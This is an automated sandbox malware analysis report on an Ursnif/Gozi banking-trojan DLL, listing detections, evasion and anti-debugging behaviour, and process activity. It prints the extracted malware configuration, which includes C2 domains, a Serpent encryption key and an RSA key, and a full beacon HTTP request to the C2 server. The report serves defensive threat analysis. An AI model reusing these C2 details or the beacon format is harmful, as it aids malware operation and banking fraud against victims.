Analysis Report SecuriteInfo.com..7135.20767

Overview

General Information

Sample Name: SecuriteInfo.com..7135.20767 (renamed file extension from 20767 to dll)
Analysis ID: 432910
MD5: 5ba7ac7fa4f9e831679832b6cc22aee8
SHA1: 813df24ac22c2666b28bc3e7fb9bd1eef2a7f395
SHA256: d2c19ac3eace29239bf919c442556abf782da5953325ee6b2626482fbf442f29
Tags: dllGozi
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Yara detected Ursnif
Writes registry values via WMI
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the installation date of Windows
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://authd.feronok.com/INsgiuDpuLw85PPWCNwmsmw/LyIcaMF9BW/RDuesN3193oziv6jZ/21yngUSJZxlB/5U99_2BFq Avira URL Cloud: Label: malware
Source: http://authd.feronok.com/INsgiuDpuLw85PPWCNwmsmw/LyIcaMF9BW/RDuesN3193oziv6jZ/21yngUSJZxlB/5U99_2BFq39/C9yL3XEqjGdzvV/F4wrCEliEtubK_2BQN3v0/mpD0sYBWj1_2BOoZ/MhYNZMroasOcyRm/Y7cgiiYGTmIYClS1bt/R_2BrGpes/V0WKbm6yczDyoBvOW06Z/_2FVUJ_2BtBEMJQ2mZ0/eqMRxCIXxJwUIjVA7qTLlE/f_2FwC5tmUPbh/r76jmp6x/obp7g2x_2BpjxmD9q5fMhKl/Y1cOMUM_2F/x9ahGBENuH7csdR7_/2FySnpeWZizz/XD203nXIqoX/COsoX4qlT56/jcBfJkpo Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000005.00000003.323666044.0000000002AB0000.00000040.00000001.sdmp Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "oUnY8+/8G/QjijBEa03/PDDCyhbZrtKtx8eYSXLSbmKpR2omzPKPDVDiaj+dBCVC5Sp5s16D5EsjkO+S9MLdqEPK+/EAZI0qxYwv0GmWkXSlJi4jyYyJKc5a5Nek5/cWbmHSXPW+Rq2S8QAD5SioqB8j4ScC8nSuqcxPZwTdEUXuTG36kAdjIfamPdH5DlrmzxdodFTkShIE2IKM5O/dCTIwhTSQIj7YF2w9akzONLDoXT8cJE2CEp0UrlGkTtCcRTWQr67rMF2nSqm+ctweTZRfgBKtrDgiEDrXnhmUscy59twRBz1A7dRDpJryotUEkXjZHrb6gv4q0NjsbeCK4Jw4zYJf7CO+eANF3Bou0fo=", "c2_domain": ["authd.feronok.com", "app.bighomegl.at"], "botnet": "1500", "server": "580", "serpent_key": "jT7xNsiVSW2IugIq", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}
Multi AV Scanner detection for domain / URL
Source: authd.feronok.com Virustotal: Detection: 11% Perma Link

Compliance:

barindex
Uses 32bit PE files
Source: SecuriteInfo.com..7135.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll Jump to behavior
Source: SecuriteInfo.com..7135.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: c:\571\bar\Nature\industry\Son.pdb source: loaddll32.exe, rundll32.exe, SecuriteInfo.com..7135.dll

Networking:

barindex
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SUPERSERVERSDATACENTERRU SUPERSERVERSDATACENTERRU
Source: global traffic HTTP traffic detected: GET /INsgiuDpuLw85PPWCNwmsmw/LyIcaMF9BW/RDuesN3193oziv6jZ/21yngUSJZxlB/5U99_2BFq39/C9yL3XEqjGdzvV/F4wrCEliEtubK_2BQN3v0/mpD0sYBWj1_2BOoZ/MhYNZMroasOcyRm/Y7cgiiYGTmIYClS1bt/R_2BrGpes/V0WKbm6yczDyoBvOW06Z/_2FVUJ_2BtBEMJQ2mZ0/eqMRxCIXxJwUIjVA7qTLlE/f_2FwC5tmUPbh/r76jmp6x/obp7g2x_2BpjxmD9q5fMhKl/Y1cOMUM_2F/x9ahGBENuH7csdR7_/2FySnpeWZizz/XD203nXIqoX/COsoX4qlT56/jcBfJkpo HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: authd.feronok.comConnection: Keep-Alive
Source: unknown DNS traffic detected: queries for: authd.feronok.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 10 Jun 2021 20:50:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: {FA4B99A6-CA78-11EB-90E4-ECF4BB862DED}.dat.23.dr, ~DF80E1CCC67DA5CD93.TMP.23.dr String found in binary or memory: http://authd.feronok.com/INsgiuDpuLw85PPWCNwmsmw/LyIcaMF9BW/RDuesN3193oziv6jZ/21yngUSJZxlB/5U99_2BFq

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.430352092.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.464198146.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.430424986.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.430241635.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.430313705.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.430450163.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.430406711.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.430285928.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.430372927.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5328, type: MEMORY
Creates a DirectInput object (often for capturing keystrokes)
Source: loaddll32.exe, 00000000.00000002.460078435.000000000073B000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.430352092.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.464198146.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.430424986.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.430241635.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.430313705.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.430450163.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.430406711.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.430285928.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.430372927.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5328, type: MEMORY

System Summary:

barindex
Writes registry values via WMI
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functions
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1C2485 NtQueryVirtualMemory, 0_2_6E1C2485
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E1C1B9C GetProcAddress,NtCreateSection,memset, 4_2_6E1C1B9C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E1C1EC7 NtMapViewOfSection, 4_2_6E1C1EC7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E1C2485 NtQueryVirtualMemory, 4_2_6E1C2485
Detected potential crypto function
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1C2264 0_2_6E1C2264
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E2237EA 0_2_6E2237EA
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E23F1F0 0_2_6E23F1F0
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E23D7C5 0_2_6E23D7C5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E23DFD2 0_2_6E23DFD2
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E224510 0_2_6E224510
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E291D40 0_2_6E291D40
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E237200 0_2_6E237200
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E23A216 0_2_6E23A216
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E221010 0_2_6E221010
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E2308E5 0_2_6E2308E5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E22A9D3 0_2_6E22A9D3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E1C2264 4_2_6E1C2264
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E2237EA 4_2_6E2237EA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E23F1F0 4_2_6E23F1F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E23D7C5 4_2_6E23D7C5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E23DFD2 4_2_6E23DFD2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E224510 4_2_6E224510
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E291D40 4_2_6E291D40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E237200 4_2_6E237200
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E23A216 4_2_6E23A216
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E221010 4_2_6E221010
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E2308E5 4_2_6E2308E5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E22A9D3 4_2_6E22A9D3
Found potential string decryption / allocating functions
Source: C:\Windows\System32\loaddll32.exe Code function: String function: 6E220F70 appears 31 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 6E220F70 appears 31 times
Sample file is different than original file name gathered from version info
Source: SecuriteInfo.com..7135.dll Binary or memory string: OriginalFilenameSon.dll8 vs SecuriteInfo.com..7135.dll
Uses 32bit PE files
Source: SecuriteInfo.com..7135.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: classification engine Classification label: mal76.troj.winDLL@12/13@1/1
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\~DF00D3A9B95DF089AC.TMP Jump to behavior
Source: SecuriteInfo.com..7135.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Program Files\internet explorer\iexplore.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com..7135.dll,Paragraphbell
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com..7135.dll'
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com..7135.dll',#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com..7135.dll,Paragraphbell
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com..7135.dll',#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com..7135.dll,Sharptwo
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4456 CREDAT:17410 /prefetch:2
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com..7135.dll',#1 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com..7135.dll,Paragraphbell Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com..7135.dll,Sharptwo Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com..7135.dll',#1 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4456 CREDAT:17410 /prefetch:2 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll Jump to behavior
Source: SecuriteInfo.com..7135.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SecuriteInfo.com..7135.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SecuriteInfo.com..7135.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SecuriteInfo.com..7135.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com..7135.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SecuriteInfo.com..7135.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: SecuriteInfo.com..7135.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: SecuriteInfo.com..7135.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: c:\571\bar\Nature\industry\Son.pdb source: loaddll32.exe, rundll32.exe, SecuriteInfo.com..7135.dll

Data Obfuscation:

barindex
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1C1F7C LoadLibraryA,GetProcAddress, 0_2_6E1C1F7C
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1C2200 push ecx; ret 0_2_6E1C2209
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1C2253 push ecx; ret 0_2_6E1C2263
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E220FB5 push ecx; ret 0_2_6E220FC8
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1D0B16 pushad ; iretd 0_2_6E1D0B17
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1CEBB5 pushfd ; iretd 0_2_6E1CEC0C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1D2807 pushad ; retf 0_2_6E1D2809
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1D10D4 push 04853024h; retf 0_2_6E1D10DB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E1C2200 push ecx; ret 4_2_6E1C2209
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E1C2253 push ecx; ret 4_2_6E1C2263
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E220FB5 push ecx; ret 4_2_6E220FC8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E1D0B16 pushad ; iretd 4_2_6E1D0B17
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E1CEBB5 pushfd ; iretd 4_2_6E1CEC0C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E1D2807 pushad ; retf 4_2_6E1D2809
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E1D10D4 push 04853024h; retf 4_2_6E1D10DB

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.430352092.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.464198146.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.430424986.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.430241635.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.430313705.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.430450163.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.430406711.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.430285928.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.430372927.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5328, type: MEMORY
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\SysWOW64\rundll32.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\loaddll32.exe Last function: Thread delayed
Source: C:\Windows\System32\loaddll32.exe Last function: Thread delayed

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E238402 ___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer, 0_2_6E238402
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E238402 ___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer, 0_2_6E238402
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E1C1F7C LoadLibraryA,GetProcAddress, 0_2_6E1C1F7C
Contains functionality to read the PEB
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E297188 mov eax, dword ptr fs:[00000030h] 0_2_6E297188
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E2970BE mov eax, dword ptr fs:[00000030h] 0_2_6E2970BE
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E296CC5 push dword ptr fs:[00000030h] 0_2_6E296CC5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E297188 mov eax, dword ptr fs:[00000030h] 4_2_6E297188
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E2970BE mov eax, dword ptr fs:[00000030h] 4_2_6E2970BE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E296CC5 push dword ptr fs:[00000030h] 4_2_6E296CC5
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E225139 GetProcessHeap, 0_2_6E225139
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E225EA1 SetUnhandledExceptionFilter, 0_2_6E225EA1
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E225ED2 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6E225ED2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E225EA1 SetUnhandledExceptionFilter, 4_2_6E225EA1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E225ED2 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_6E225ED2

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com..7135.dll',#1 Jump to behavior
Source: loaddll32.exe, 00000000.00000002.460172900.0000000000CD0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.461520126.0000000003680000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: loaddll32.exe, 00000000.00000002.460172900.0000000000CD0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.461520126.0000000003680000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.460172900.0000000000CD0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.461520126.0000000003680000.00000002.00000001.sdmp Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.460172900.0000000000CD0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.461520126.0000000003680000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA, 0_2_6E1C1E8A
Source: C:\Windows\System32\loaddll32.exe Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage, 0_2_6E22E72D
Source: C:\Windows\System32\loaddll32.exe Code function: _GetPrimaryLen,EnumSystemLocalesW, 0_2_6E22E438
Source: C:\Windows\System32\loaddll32.exe Code function: _GetPrimaryLen,EnumSystemLocalesW, 0_2_6E22E4B5
Source: C:\Windows\System32\loaddll32.exe Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage, 0_2_6E22E538
Source: C:\Windows\System32\loaddll32.exe Code function: EnumSystemLocalesW, 0_2_6E22ED13
Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoW, 0_2_6E22ED99
Source: C:\Windows\System32\loaddll32.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 0_2_6E22FA7E
Source: C:\Windows\System32\loaddll32.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson, 0_2_6E223BC0
Source: C:\Windows\System32\loaddll32.exe Code function: EnumSystemLocalesW, 0_2_6E22E3DC
Source: C:\Windows\System32\loaddll32.exe Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_6E22E857
Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoW,_GetPrimaryLen, 0_2_6E22E904
Source: C:\Windows\System32\loaddll32.exe Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW, 0_2_6E22E168
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA, 4_2_6E1C1E8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage, 4_2_6E22E72D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _GetPrimaryLen,EnumSystemLocalesW, 4_2_6E22E438
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _GetPrimaryLen,EnumSystemLocalesW, 4_2_6E22E4B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage, 4_2_6E22E538
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 4_2_6E22ED13
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 4_2_6E22ED99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 4_2_6E22FA7E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson, 4_2_6E223BC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 4_2_6E22E3DC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP, 4_2_6E22E857
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,_GetPrimaryLen, 4_2_6E22E904
